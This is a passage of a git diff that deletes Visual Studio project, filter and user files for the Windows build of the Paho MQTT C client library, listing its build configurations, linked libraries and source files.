-      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;PAHOMQTT3C_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Windows</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <AdditionalDependencies>ws2_32.lib;kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies)</AdditionalDependencies>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <ClCompile>
-      <WarningLevel>Level3</WarningLevel>
-      <PrecompiledHeader>NotUsing</PrecompiledHeader>
-      <Optimization>MaxSpeed</Optimization>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;PAHOMQTT3C_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Windows</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <EnableCOMDATFolding>true</EnableCOMDATFolding>
-      <OptimizeReferences>true</OptimizeReferences>
-      <AdditionalDependencies>ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <ClCompile>
-      <WarningLevel>Level3</WarningLevel>
-      <PrecompiledHeader>NotUsing</PrecompiledHeader>
-      <Optimization>MaxSpeed</Optimization>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;PAHOMQTT3C_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Windows</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <EnableCOMDATFolding>true</EnableCOMDATFolding>
-      <OptimizeReferences>true</OptimizeReferences>
-      <AdditionalDependencies>ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemGroup>
-    <ClCompile Include="..\..\src\Clients.c" />
-    <ClCompile Include="..\..\src\Heap.c" />
-    <ClCompile Include="..\..\src\LinkedList.c" />
-    <ClCompile Include="..\..\src\Log.c" />
-    <ClCompile Include="..\..\src\Messages.c" />
-    <ClCompile Include="..\..\src\MQTTClient.c" />
-    <ClCompile Include="..\..\src\MQTTPacket.c" />
-    <ClCompile Include="..\..\src\MQTTPacketOut.c" />
-    <ClCompile Include="..\..\src\MQTTPersistence.c" />
-    <ClCompile Include="..\..\src\MQTTPersistenceDefault.c" />
-    <ClCompile Include="..\..\src\MQTTProtocolClient.c" />
-    <ClCompile Include="..\..\src\MQTTProtocolOut.c" />
-    <ClCompile Include="..\..\src\MQTTVersion.c" />
-    <ClCompile Include="..\..\src\Socket.c" />
-    <ClCompile Include="..\..\src\SocketBuffer.c" />
-    <ClCompile Include="..\..\src\SSLSocket.c" />
-    <ClCompile Include="..\..\src\StackTrace.c" />
-    <ClCompile Include="..\..\src\Thread.c" />
-    <ClCompile Include="..\..\src\Tree.c" />
-    <ClCompile Include="..\..\src\utf-8.c" />
-  </ItemGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
-  <ImportGroup Label="ExtensionTargets">
-  </ImportGroup>
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3c/paho-mqtt3c.vcxproj.filters b/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3c/paho-mqtt3c.vcxproj.filters
deleted file mode 100644
index 18988cc..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3c/paho-mqtt3c.vcxproj.filters
+++ /dev/null
@@ -1,79 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup>
-    <Filter Include="Source Files">
-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
-    </Filter>
-    <Filter Include="Header Files">
-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
-      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
-    </Filter>
-    <Filter Include="Resource Files">
-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
-    </Filter>
-  </ItemGroup>
-  <ItemGroup>
-    <ClCompile Include="..\..\src\Clients.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Heap.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\LinkedList.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Log.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Messages.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTClient.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTPacket.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTPacketOut.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTPersistence.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTPersistenceDefault.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTProtocolClient.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTProtocolOut.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTVersion.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Socket.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\SocketBuffer.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\SSLSocket.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\StackTrace.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Thread.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Tree.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\utf-8.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-  </ItemGroup>
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3c/paho-mqtt3c.vcxproj.user b/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3c/paho-mqtt3c.vcxproj.user
deleted file mode 100644
index ace9a86..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3c/paho-mqtt3c.vcxproj.user
+++ /dev/null
@@ -1,3 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3cs/paho-mqtt3cs.vcxproj b/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3cs/paho-mqtt3cs.vcxproj
deleted file mode 100755
index c70676d..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3cs/paho-mqtt3cs.vcxproj
+++ /dev/null
@@ -1,204 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup Label="ProjectConfigurations">

-    <ProjectConfiguration Include="Debug|Win32">

-      <Configuration>Debug</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Debug|x64">

-      <Configuration>Debug</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|Win32">

-      <Configuration>Release</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|x64">

-      <Configuration>Release</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-  </ItemGroup>

-  <PropertyGroup Label="Globals">

-    <ProjectGuid>{17F07F98-AA5F-4373-9877-992A341D650A}</ProjectGuid>

-    <Keyword>Win32Proj</Keyword>

-    <RootNamespace>pahomqtt3as</RootNamespace>

-    <WindowsTargetPlatformVersion>10.0.14393.0</WindowsTargetPlatformVersion>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">

-    <ConfigurationType>DynamicLibrary</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v141</PlatformToolset>

-    <CharacterSet>Unicode</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">

-    <ConfigurationType>DynamicLibrary</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v141</PlatformToolset>

-    <CharacterSet>Unicode</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">

-    <ConfigurationType>DynamicLibrary</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v141</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>Unicode</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">

-    <ConfigurationType>DynamicLibrary</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v141</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>Unicode</CharacterSet>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />

-  <ImportGroup Label="ExtensionSettings">

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <PropertyGroup Label="UserMacros" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <LinkIncremental>true</LinkIncremental>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <LinkIncremental>true</LinkIncremental>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <LinkIncremental>false</LinkIncremental>

-    <OutDir>$(SolutionDir)..\build\output\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <LinkIncremental>false</LinkIncremental>

-  </PropertyGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <ClCompile>

-      <PrecompiledHeader>NotUsing</PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>WIN32_LEAN_AND_MEAN;OPENSSL;WIN32;_DEBUG;_WINDOWS;_USRDLL;PAHOMQTT3AS_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>

-      <AdditionalIncludeDirectories>$(OpenSSLDir)\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <AdditionalDependencies>ws2_32.lib;libeay32.lib;ssleay32.lib;%(AdditionalDependencies)</AdditionalDependencies>

-      <AdditionalLibraryDirectories>$(OpenSSLDir)\lib;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <ClCompile>

-      <PrecompiledHeader>NotUsing</PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>WIN32_LEAN_AND_MEAN;OPENSSL;WIN32;_DEBUG;_WINDOWS;_USRDLL;PAHOMQTT3AS_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>

-      <AdditionalIncludeDirectories>$(OpenSSLDir)\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <AdditionalDependencies>ws2_32.lib;libeay32.lib;ssleay32.lib;%(AdditionalDependencies)</AdditionalDependencies>

-      <AdditionalLibraryDirectories>$(OpenSSLDir)\lib;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>NotUsing</PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>WIN32_LEAN_AND_MEAN;OPENSSL;WIN32;NDEBUG;_WINDOWS;_USRDLL;PAHOMQTT3AS_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>

-      <AdditionalIncludeDirectories>$(OpenSSLDir)\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>false</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-      <AdditionalDependencies>ws2_32.lib;libeay32.lib;ssleay32.lib;%(AdditionalDependencies)</AdditionalDependencies>

-      <AdditionalLibraryDirectories>$(OpenSSLDir)\lib;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>NotUsing</PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>WIN32_LEAN_AND_MEAN;OPENSSL;WIN32;NDEBUG;_WINDOWS;_USRDLL;PAHOMQTT3AS_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>

-      <AdditionalIncludeDirectories>$(OpenSSLDir)\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>false</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-      <AdditionalDependencies>ws2_32.lib;libeay32.lib;ssleay32.lib;%(AdditionalDependencies)</AdditionalDependencies>

-      <AdditionalLibraryDirectories>$(OpenSSLDir)\lib;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\src\Clients.h" />

-    <ClInclude Include="..\..\src\Heap.h" />

-    <ClInclude Include="..\..\src\LinkedList.h" />

-    <ClInclude Include="..\..\src\Log.h" />

-    <ClInclude Include="..\..\src\Messages.h" />

-    <ClInclude Include="..\..\src\MQTTAsync.h" />

-    <ClInclude Include="..\..\src\MQTTClient.h" />

-    <ClInclude Include="..\..\src\MQTTClientPersistence.h" />

-    <ClInclude Include="..\..\src\MQTTPacket.h" />

-    <ClInclude Include="..\..\src\MQTTPacketOut.h" />

-    <ClInclude Include="..\..\src\MQTTPersistence.h" />

-    <ClInclude Include="..\..\src\MQTTPersistenceDefault.h" />

-    <ClInclude Include="..\..\src\MQTTProtocol.h" />

-    <ClInclude Include="..\..\src\MQTTProtocolClient.h" />

-    <ClInclude Include="..\..\src\MQTTProtocolOut.h" />

-    <ClInclude Include="..\..\src\Socket.h" />

-    <ClInclude Include="..\..\src\SocketBuffer.h" />

-    <ClInclude Include="..\..\src\SSLSocket.h" />

-    <ClInclude Include="..\..\src\StackTrace.h" />

-    <ClInclude Include="..\..\src\Thread.h" />

-    <ClInclude Include="..\..\src\Tree.h" />

-    <ClInclude Include="..\..\src\utf-8.h" />

-  </ItemGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\src\Clients.c" />

-    <ClCompile Include="..\..\src\Heap.c" />

-    <ClCompile Include="..\..\src\LinkedList.c" />

-    <ClCompile Include="..\..\src\Log.c" />

-    <ClCompile Include="..\..\src\Messages.c" />

-    <ClCompile Include="..\..\src\MQTTClient.c" />

-    <ClCompile Include="..\..\src\MQTTPacket.c" />

-    <ClCompile Include="..\..\src\MQTTPacketOut.c" />

-    <ClCompile Include="..\..\src\MQTTPersistence.c" />

-    <ClCompile Include="..\..\src\MQTTPersistenceDefault.c" />

-    <ClCompile Include="..\..\src\MQTTProtocolClient.c" />

-    <ClCompile Include="..\..\src\MQTTProtocolOut.c" />

-    <ClCompile Include="..\..\src\MQTTVersion.c" />

-    <ClCompile Include="..\..\src\Socket.c" />

-    <ClCompile Include="..\..\src\SocketBuffer.c" />

-    <ClCompile Include="..\..\src\SSLSocket.c" />

-    <ClCompile Include="..\..\src\StackTrace.c" />

-    <ClCompile Include="..\..\src\Thread.c" />

-    <ClCompile Include="..\..\src\Tree.c" />

-    <ClCompile Include="..\..\src\utf-8.c" />

-  </ItemGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />

-  <ImportGroup Label="ExtensionTargets">

-  </ImportGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3cs/paho-mqtt3cs.vcxproj.filters b/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3cs/paho-mqtt3cs.vcxproj.filters
deleted file mode 100644
index 95f68ae..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3cs/paho-mqtt3cs.vcxproj.filters
+++ /dev/null
@@ -1,147 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup>
-    <Filter Include="Source Files">
-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
-    </Filter>
-    <Filter Include="Header Files">
-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
-      <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
-    </Filter>
-    <Filter Include="Resource Files">
-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
-    </Filter>
-  </ItemGroup>
-  <ItemGroup>
-    <ClInclude Include="..\..\src\Clients.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\Heap.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\LinkedList.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\Log.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\Messages.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTAsync.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTClient.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTClientPersistence.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTPacket.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTPacketOut.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTPersistence.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTPersistenceDefault.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTProtocol.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTProtocolClient.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTProtocolOut.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\Socket.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\SocketBuffer.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\SSLSocket.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\StackTrace.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\Thread.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\Tree.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\utf-8.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-  </ItemGroup>
-  <ItemGroup>
-    <ClCompile Include="..\..\src\Clients.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Heap.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\LinkedList.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Log.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Messages.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTPacket.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTPacketOut.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTPersistence.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTPersistenceDefault.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTProtocolClient.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTProtocolOut.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTVersion.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Socket.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\SocketBuffer.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\SSLSocket.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\StackTrace.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Thread.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Tree.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\utf-8.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTClient.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-  </ItemGroup>
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3cs/paho-mqtt3cs.vcxproj.user b/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3cs/paho-mqtt3cs.vcxproj.user
deleted file mode 100644
index ef5ff2a..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3cs/paho-mqtt3cs.vcxproj.user
+++ /dev/null
@@ -1,4 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <PropertyGroup />
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/stdoutsub/stdoutsub.vcxproj b/thirdparty/paho.mqtt.c/Windows Build/stdoutsub/stdoutsub.vcxproj
deleted file mode 100644
index a6d8c85..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/stdoutsub/stdoutsub.vcxproj
+++ /dev/null
@@ -1,175 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup Label="ProjectConfigurations">
-    <ProjectConfiguration Include="Debug|Win32">
-      <Configuration>Debug</Configuration>
-      <Platform>Win32</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Debug|x64">
-      <Configuration>Debug</Configuration>
-      <Platform>x64</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Release|Win32">
-      <Configuration>Release</Configuration>
-      <Platform>Win32</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Release|x64">
-      <Configuration>Release</Configuration>
-      <Platform>x64</Platform>
-    </ProjectConfiguration>
-  </ItemGroup>
-  <PropertyGroup Label="Globals">
-    <ProjectGuid>{DFDF6238-DA97-4474-84C2-D313E8B985AE}</ProjectGuid>
-    <Keyword>Win32Proj</Keyword>
-    <RootNamespace>paho-cs-sub</RootNamespace>
-    <ProjectName>paho-cs-sub</ProjectName>
-    <WindowsTargetPlatformVersion>10.0.14393.0</WindowsTargetPlatformVersion>
-  </PropertyGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
-    <UseDebugLibraries>true</UseDebugLibraries>
-    <CharacterSet>Unicode</CharacterSet>
-    <PlatformToolset>v141</PlatformToolset>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
-    <UseDebugLibraries>true</UseDebugLibraries>
-    <CharacterSet>Unicode</CharacterSet>
-    <PlatformToolset>v141</PlatformToolset>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
-    <UseDebugLibraries>false</UseDebugLibraries>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
